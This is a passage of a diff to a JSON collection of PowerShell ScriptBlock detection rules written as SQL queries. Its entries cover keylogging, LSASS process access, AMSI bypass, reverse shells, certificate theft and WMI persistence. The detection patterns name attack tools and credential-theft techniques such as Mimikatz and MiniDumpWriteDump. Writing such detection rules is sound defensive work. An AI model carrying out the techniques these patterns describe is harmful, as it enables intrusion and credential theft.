- "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1546.013" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmi_persistence.yml" + "filename": "posh_ps_trigger_profiles.yml" }, { - "title": "Powershell Keylogging", - "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", - "status": "experimental", - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "author": "frack113", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", + 
"status": "test", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.collection", - "attack.t1056.001" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "posh_ps_keylogging.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", - "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "status": "test", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "App-V clients" + 
"Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "posh_ps_syncappvpublishingserver_exe.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", - "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", - "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Extracting Information with PowerShell", + "id": "bd5971a7-626d-46ab-8176-ed643f694f68", + "status": "test", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" ], - "filename": "posh_ps_user_discovery_get_aduser.yml" + "filename": "posh_ps_susp_extracting.yml" }, { - "title": "Suspicious TCP Tunnel Via PowerShell Script", - "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "title": "Change User Agents with WebRequest", + "id": "d4488827-73af-4f8d-9244-7b7662ef046e", "status": "experimental", - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "author": "frack113", "tags": [ "attack.command_and_control", - "attack.t1090" + "attack.t1071.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE 
'%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_proxy_scripts.yml" + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Data Compressed - PowerShell", + "id": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "status": "test", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.exfiltration", + "attack.t1560" ], "falsepositives": [ - "Unknown" + "Highly likely if archive operations are done via PowerShell." 
], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Recurse%' ESCAPE '\\' AND ScriptBlockText LIKE '%|%' ESCAPE '\\' AND ScriptBlockText LIKE '%Compress-Archive%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "posh_ps_data_compressed.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" 
@@ -7597,46 +7160,47 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious IO.FileStream", - "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "title": "Enable Windows Remote Management", + 
"id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", "status": "test", - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_iofilestream.yml" + "filename": "posh_ps_enable_psremoting.yml" }, { - "title": "PowerShell Hotfix Enumeration", - "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "status": "experimental", - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": "test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery" + 
"attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Legitimate administration scripts" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "posh_ps_hotfix_enum.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { "title": "Powershell MsXml COM Object", 
@@ -7658,325 +7222,390 @@ "filename": "posh_ps_msxml_com.yml" }, { - "title": "Powershell Local Email Collection", - "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", - "status": "test", - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "author": "frack113", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "status": "experimental", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1114.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR 
ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mail_acces.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { - "title": "Winlogon Helper DLL", - "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", + "id": "db885529-903f-4c5d-9864-28fe199e6370", "status": "experimental", - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE 
'\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "posh_ps_winlogon_helper_dll.yml" + "filename": "posh_ps_computer_discovery_get_adcomputer.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled", - "id": "55c925c1-7195-426b-a136-a9396800e29b", + "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", + "id": "afd3df04-948d-46f6-ae44-25966c44b97f", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." 
+ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" ], - "filename": "posh_ps_enable_susp_windows_optional_feature.yml" + "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Suspicious Mount-DiskImage", - "id": "29e1c216-6408-489d-8a06-ee9d151ef819", - "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "author": "frack113", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "status": "experimental", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mount_diskimage.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", + "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "status": "experimental", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockText LIKE '%#%' ESCAPE 
'\\'))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "posh_ps_amsi_null_bits_bypass.yml" }, { - "title": "Replace Desktop Wallpaper by Powershell", - "id": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "status": "test", - "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", - "author": "frack113", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-ItemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%Registry::%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%WallPaper%' ESCAPE '\\') OR ScriptBlockText LIKE '%SystemParametersInfo(20,0,%,3)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_wallpaper.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", - "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + 
"title": "Potential WinAPI Calls Via PowerShell Scripts", + "id": "03d83090-8cba-44a0-b02f-0b756a050306", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Detects use of WinAPI Functions in PowerShell scripts", + "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1106" + ], + "falsepositives": [ + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' 
